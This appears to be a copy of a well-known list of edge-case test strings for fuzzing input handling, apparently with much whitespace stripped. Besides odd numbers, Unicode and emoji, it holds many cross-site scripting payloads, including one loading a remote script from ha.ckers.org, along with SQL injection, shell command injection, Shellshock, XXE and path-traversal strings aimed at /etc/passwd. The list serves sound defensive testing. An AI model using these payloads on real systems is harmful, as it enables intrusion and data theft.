undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
False
TRUE
FALSE
None
hasOwnProperty
\\
\\\\
0
1
1.00
$1.00
1/2
1E2
1E02
1E+02
-1
-1.00
-$1.00
-1/2
-1E2
-1E02
-1E+02
1/0
0/0
-2147483648/-1
-9223372036854775808/-1
-0
-0.0
+0
+0.0
0.00
0..0
.
0.0.0
000
00

000
0.0/0
1.0/0.0
0.0/0.0
10/00
00/00
--1
-
-.
-
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
-Infinity
INF
1#INF
-1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1000.00
1000.00
1'000.00
1000000.00
1000000.00
1'000'000.00
1.00000
100000
1'00000
1.000.00000
100000000
1'000'00000
01000
08
09
2.2250738585072011e-308
./;'[]\\-=
<>?:\{}|_+
!@#$%^&*()`~
\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f

\t\u000b\f            ​    　
­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿
﻿
￾
Ω≈ç√∫˜µ≤≥÷
åß∂ƒ©˙∆˚¬…æ
œ∑´®†¥¨ˆøπ“‘
¡™£¢∞§¶•ªº–≠
¸˛Ç◊ı˜Â¯˘¿
ÅÍÎÏ˝ÓÔÒÚÆ☃
Œ„´‰ˇÁ¨ˆØ∏”’
`⁄€‹›ﬁﬂ‡°·‚—±
⅛⅜⅝⅞
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
٠١٢٣٤٥٦٧٨٩
⁰⁴⁵
₀₁₂
⁰⁴⁵₀₁₂
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
'
\
''
\\
'\'
\''''\'\
\'\'\''''\
<fooval=“bar”/>
<fooval=“bar”/>
<fooval=”bar“/>
<fooval=`bar'/>
田中さんにあげて下さい
パーティーへ行かないか
和製漢語
部落格
사회과학원어학연구소
찦차를타고온펲시맨과쑛다리똠방각하
社會科學院語學研究所
울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏
表ポあA鷗ŒéＢ逍Üßªąñ丂㐀𠀀
Ⱥ
Ⱦ
ヽ༼ຈل͜ຈ༽ﾉヽ༼ຈل͜ຈ༽ﾉ
(｡◕∀◕｡)
｀ｨ(´∀｀∩
__ﾛ(_*)
・(￣∀￣)・:*:
"ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ
。・:*:・゜’(☻ω☻)。・:*:・゜’
(╯°□°）╯︵┻━┻)
(ﾉಥ益ಥ）ﾉ﻿┻━┻
┬─┬ノ(º_ºノ)
( ͡° ͜ʖ ͡°)
😍
👩🏽
👾🙇💁🙅🙆🙋🙎🙍
🐵🙈🙉🙊
❤️💔💌💕💞💓💗💖💘💝💟💜💛💚💙
✋🏿💪🏿👐🏿🙌🏿👏🏿🙏🏿
🚾🆒🆓🆕🆖🆗🆙🏧
0️⃣1️⃣2️⃣3️⃣4️⃣5️⃣6️⃣7️⃣8️⃣9️⃣🔟
🇺🇸🇷🇺🇸🇦🇫🇦🇲🇸
🇺🇸🇷🇺🇸🇦🇫🇦🇲
🇺🇸🇷🇺🇸🇦
１２３
١٢٣
ثمنفسسقطتوبالتحديد،جزيرتيباستخدامأندنو.إذهنا؟الستاروتنصيبكان.أهّلايطاليا،بريطانيا-فرنساقدأخذ.سليمان،إتفاقيةبينمايذكرالحدودأيبعدمعاملةبولندا،الإطلاقعلإيو.
בְּרֵאשִׁיתבָּרָאאֱלֹהִיםאֵתהַשָּׁמַיִםוְאֵתהָאָרֶץ
הָיְתָהtestالصفحاتالتّحول
﷽
ﷺ
مُنَاقَشَةُسُبُلِاِسْتِخْدَامِاللُّغَةِفِيالنُّظُمِالْقَائِمَةِوَفِيميَخُصَّالتَّطْبِيقَاتُالْحاسُوبِيَّةُ،
test
test
 test 
test⁠test
⁦test⁧
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
"̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
"̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
"̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
˙ɐnbᴉlɐɐuƃɐɯǝɹolopʇǝǝɹoqɐlʇnʇunpᴉpᴉɔuᴉɹodɯǝʇpoɯsnᴉǝoppǝs'ʇᴉlǝƃuᴉɔsᴉdᴉpɐɹnʇǝʇɔǝsuoɔ'ʇǝɯɐʇᴉsɹolopɯnsdᴉɯǝɹo˥
00˙Ɩ$-
Ｔｈｅｑｕｉｃｋｂｒｏｗｎｆｏｘｊｕｍｐｓｏｖｅｒｔｈｅｌａｚｙｄｏｇ
𝐓𝐡𝐞𝐪𝐮𝐢𝐜𝐤𝐛𝐫𝐨𝐰𝐧𝐟𝐨𝐱𝐣𝐮𝐦𝐩𝐬𝐨𝐯𝐞𝐫𝐭𝐡𝐞𝐥𝐚𝐳𝐲𝐝𝐨𝐠
𝕿𝖍𝖊𝖖𝖚𝖎𝖈𝖐𝖇𝖗𝖔𝖜𝖓𝖋𝖔𝖝𝖏𝖚𝖒𝖕𝖘𝖔𝖛𝖊𝖗𝖙𝖍𝖊𝖑𝖆𝖟𝖞𝖉𝖔𝖌
𝑻𝒉𝒆𝒒𝒖𝒊𝒄𝒌𝒃𝒓𝒐𝒘𝒏𝒇𝒐𝒙𝒋𝒖𝒎𝒑𝒔𝒐𝒗𝒆𝒓𝒕𝒉𝒆𝒍𝒂𝒛𝒚𝒅𝒐𝒈
𝓣𝓱𝓮𝓺𝓾𝓲𝓬𝓴𝓫𝓻𝓸𝔀𝓷𝓯𝓸𝔁𝓳𝓾𝓶𝓹𝓼𝓸𝓿𝓮𝓻𝓽𝓱𝓮𝓵𝓪𝔃𝔂𝓭𝓸𝓰
𝕋𝕙𝕖𝕢𝕦𝕚𝕔𝕜𝕓𝕣𝕠𝕨𝕟𝕗𝕠𝕩𝕛𝕦𝕞𝕡𝕤𝕠𝕧𝕖𝕣𝕥𝕙𝕖𝕝𝕒𝕫𝕪𝕕𝕠𝕘
𝚃𝚑𝚎𝚚𝚞𝚒𝚌𝚔𝚋𝚛𝚘𝚠𝚗𝚏𝚘𝚡𝚓𝚞𝚖𝚙𝚜𝚘𝚟𝚎𝚛𝚝𝚑𝚎𝚕𝚊𝚣𝚢𝚍𝚘𝚐
⒯⒣⒠⒬⒰⒤⒞⒦⒝⒭⒪⒲⒩⒡⒪⒳⒥⒰⒨⒫⒮⒪⒱⒠⒭⒯⒣⒠⒧⒜⒵⒴⒟⒪⒢
<script>alert(123)</script>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<imgsrc=xonerror=alert(123)/>
<svg><script>123<1>alert(123)</script>
\><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
</script><script>alert(123)</script>
onfocus=JaVaSCript:alert(123)autofocus
\onfocus=JaVaSCript:alert(123)autofocus
'onfocus=JaVaSCript:alert(123)autofocus
＜script＞alert(123)＜/script＞
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
\;alert(123);t=\
';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
\><script>alert(123);</scriptx=\
'><script>alert(123);</scriptx='
><script>alert(123);</scriptx=
\autofocusonkeyup=\javascript:alert(123)
'autofocusonkeyup='javascript:alert(123)
<script\\x20type=\text/javascript\>javascript:alert(1);</script>
<script\\x3Etype=\text/javascript\>javascript:alert(1);</script>
<script\\x0Dtype=\text/javascript\>javascript:alert(1);</script>
<script\\x09type=\text/javascript\>javascript:alert(1);</script>
<script\\x0Ctype=\text/javascript\>javascript:alert(1);</script>
<script\\x2Ftype=\text/javascript\>javascript:alert(1);</script>
<script\\x0Atype=\text/javascript\>javascript:alert(1);</script>
'`\><\\x3Cscript>javascript:alert(1)</script>
'`\><\\x00script>javascript:alert(1)</script>
ABC<divstyle=\x\\x3Aexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:expression\\x5C(javascript:alert(1)\>DEF
ABC<divstyle=\x:expression\\x00(javascript:alert(1)\>DEF
ABC<divstyle=\x:exp\\x00ression(javascript:alert(1)\>DEF
ABC<divstyle=\x:exp\\x5Cression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x0Aexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x09expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE3\\x80\\x80expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x84expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xC2\\xA0expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x80expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x0Dexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x0Cexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x87expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x20expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x88expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x00expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x86expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x85expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x82expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\x0Bexpression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x81expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x83expression(javascript:alert(1)\>DEF
ABC<divstyle=\x:\\xE2\\x80\\x89expression(javascript:alert(1)\>DEF
<ahref=\\\x0Bjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x0Fjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xC2\\xA0javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x05javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x18javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x11javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x88javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x89javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x80javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x17javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x03javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x0Ejavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Ajavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x00javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x10javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x82javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x20javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x13javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x09javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x14javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x19javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\xAFjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Fjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x81javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Djavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x87javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x07javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE1\\x9A\\x80javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x83javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x04javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x01javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x08javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x84javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x86javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE3\\x80\\x80javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x12javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x0Djavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x0Ajavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x0Cjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x15javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\xA8javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x16javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x02javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Bjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x06javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\xA9javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x80\\x85javascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Ejavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\\\x1Cjavascript:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\javascript\\x00:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\javascript\\x3A:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\javascript\\x09:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\javascript\\x0D:javascript:alert(1)\id=\fuzzelement1\>test</a>
<ahref=\javascript\\x0A:javascript:alert(1)\id=\fuzzelement1\>test</a>
`\'><imgsrc=xxx:x\\x0Aonerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x22onerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x0Bonerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x0Donerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x2Fonerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x09onerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x0Conerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x00onerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x27onerror=javascript:alert(1)>
`\'><imgsrc=xxx:x\\x20onerror=javascript:alert(1)>
\`'><script>\\x3Bjavascript:alert(1)</script>
\`'><script>\\x0Djavascript:alert(1)</script>
\`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>
\`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>
\`'><script>\\x09javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>
\`'><script>\\x00javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>
\`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>
\`'><script>\\x0Cjavascript:alert(1)</script>
\`'><script>\\x2Bjavascript:alert(1)</script>
\`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>
\`'><script>-javascript:alert(1)</script>
\`'><script>\\x0Ajavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>
\`'><script>\\x7Ejavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>
\`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>
\`'><script>\\xC2\\x85javascript:alert(1)</script>
\`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>
\`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>
\`'><script>\\x21javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>
\`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>
\`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>
\`'><script>\\x0Bjavascript:alert(1)</script>
\`'><script>\\x20javascript:alert(1)</script>
\`'><script>\\xC2\\xA0javascript:alert(1)</script>
<img\\x00src=xonerror=\alert(1)\>
<img\\x47src=xonerror=\javascript:alert(1)\>
<img\\x11src=xonerror=\javascript:alert(1)\>
<img\\x12src=xonerror=\javascript:alert(1)\>
<img\\x47src=xonerror=\javascript:alert(1)\>
<img\\x10src=xonerror=\javascript:alert(1)\>
<img\\x13src=xonerror=\javascript:alert(1)\>
<img\\x32src=xonerror=\javascript:alert(1)\>
<img\\x47src=xonerror=\javascript:alert(1)\>
<img\\x11src=xonerror=\javascript:alert(1)\>
<img\\x47src=xonerror=\javascript:alert(1)\>
<img\\x34src=xonerror=\javascript:alert(1)\>
<img\\x39src=xonerror=\javascript:alert(1)\>
<img\\x00src=xonerror=\javascript:alert(1)\>
<imgsrc\\x09=xonerror=\javascript:alert(1)\>
<imgsrc\\x10=xonerror=\javascript:alert(1)\>
<imgsrc\\x13=xonerror=\javascript:alert(1)\>
<imgsrc\\x32=xonerror=\javascript:alert(1)\>
<imgsrc\\x12=xonerror=\javascript:alert(1)\>
<imgsrc\\x11=xonerror=\javascript:alert(1)\>
<imgsrc\\x00=xonerror=\javascript:alert(1)\>
<imgsrc\\x47=xonerror=\javascript:alert(1)\>
<imgsrc=x\\x09onerror=\javascript:alert(1)\>
<imgsrc=x\\x10onerror=\javascript:alert(1)\>
<imgsrc=x\\x11onerror=\javascript:alert(1)\>
<imgsrc=x\\x12onerror=\javascript:alert(1)\>
<imgsrc=x\\x13onerror=\javascript:alert(1)\>
<img[a][b][c]src[d]=x[e]onerror=[f]\alert(1)\>
<imgsrc=xonerror=\\x09\javascript:alert(1)\>
<imgsrc=xonerror=\\x10\javascript:alert(1)\>
<imgsrc=xonerror=\\x11\javascript:alert(1)\>
<imgsrc=xonerror=\\x12\javascript:alert(1)\>
<imgsrc=xonerror=\\x32\javascript:alert(1)\>
<imgsrc=xonerror=\\x00\javascript:alert(1)\>
<ahref=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<imgsrc=\x``<script>javascript:alert(1)</script>\``>
<imgsrconerror/\'\=alt=javascript:alert(1)//\>
<titleonpropertychange=javascript:alert(1)></title><titletitle=>
<ahref=http://foo.bar/#x=`y></a><imgalt=\`><imgsrc=x:xonerror=javascript:alert(1)></a>\>
<!--[if]><script>javascript:alert(1)</script-->
<!--[if<imgsrc=xonerror=javascript:alert(1)//]>-->
<scriptsrc=\/\\%(jscript)s\></script>
<scriptsrc=\\\\\%(jscript)s\></script>
<IMG\\\><SCRIPT>alert(\XSS\)</SCRIPT>\>
<IMGSRC=javascript:alert(String.fromCharCode(888383))>
<IMGSRC=#onmouseover=\alert('xxs')\>
<IMGSRC=onmouseover=\alert('xxs')\>
<IMGonmouseover=\alert('xxs')\>
<IMGSRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMGSRC=\javascript:alert('XSS');\>
<IMGSRC=\jav&#x09;ascript:alert('XSS');\>
<IMGSRC=\jav&#x0A;ascript:alert('XSS');\>
<IMGSRC=\jav&#x0D;ascript:alert('XSS');\>
perl-e'print\<IMGSRC=java\\0script:alert(\\\XSS\\\)>\;'>out
<IMGSRC=\&#14;javascript:alert('XSS');\>
<SCRIPT/XSSSRC=\http://ha.ckers.org/xss.js\></SCRIPT>
<BODYonload!#$%&()*~+-_.:;?@[/|\\]^`=alert(\XSS\)>
<SCRIPT/SRC=\http://ha.ckers.org/xss.js\></SCRIPT>
<<SCRIPT>alert(\XSS\);//<</SCRIPT>
<SCRIPTSRC=http://ha.ckers.org/xss.js?<B>
<SCRIPTSRC=//ha.ckers.org/.j>
<IMGSRC=\javascript:alert('XSS')\
<iframesrc=http://ha.ckers.org/scriptlet.html<
\\\;alert('XSS');//
<uoncopy=alert()>Copyme</u>
<ionwheel=alert(1)>Scrolloverme</i>
<plaintext>
http://a/%%30%30
</textarea><script>alert(123)</script>
1;DROPTABLEusers
1';DROPTABLEusers--1
'OR1=1--1
'OR'1'='1
%
_
-
--
--version
--help
$USER
/dev/null;touch/tmp/blns.fail;echo
`touch/tmp/blns.fail`
$(touch/tmp/blns.fail)
@{[system\touch/tmp/blns.fail\]}
eval(\puts'helloworld'\)
System(\ls-al/\)
`ls-al/`
Kernel.exec(\ls-al/\)
Kernel.exit(1)
%x('ls-al/')
<?xmlversion=\1.0\encoding=\ISO-8859-1\?><!DOCTYPEfoo[<!ELEMENTfooANY><!ENTITYxxeSYSTEM\file:///etc/passwd\>]><foo>&xxe;</foo>
$HOME
$ENV{'HOME'}
%d
%s%s%s%s%s
{0}
%*.*s
%@
%n
File:///
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/hosts
(){0;};touch/tmp/blns.shellshock1.fail;
(){_;}>_[$($())]{touch/tmp/blns.shellshock2.fail;}
<<<%s(un='%s')=%u
+++ATH0
CON
PRN
AUX
CLOCK$
NUL
A:
ZZ:
COM1
LPT1
LPT2
LPT3
COM2
COM3
COM4
DCCSENDSTARTKEYLOGGER000
ScunthorpeGeneralHospital
PenistoneCommunityChurch
LightwaterCountryPark
JimmyClitheroe
HornimanMuseum
shitakemushrooms
RomansInSussex.co.uk
http://www.cum.qc.ca/
CraigCockburnSoftwareSpecialist
LindaCallahan
Dr.HermanI.Libshitz
magnacumlaude
SuperBowlXXX
medievalerectionofparapets
evaluate
mocha
expression
Arsenalcanal
classic
TysonGay
DickVanDyke
basement
Ifyou'rereadingthisyou'vebeeninacomaforalmost20yearsnow.We'retryinganewtechnique.Wedon'tknowwherethismessagewillendupinyourdreambutwehopeitworks.Pleasewakeupwemissyou.
Rosesare\u001b[0;31mred\u001b[0mvioletsare\u001b[0;34mblue.Hopeyouenjoyterminalhue
Butnow...\u001b[20Cformygreatesttrick...\u001b[8m
Thequic\b\b\b\b\b\bkbrownfo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x...[Beeeep]
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
🏳0🌈️
జ్ఞ‌ా
]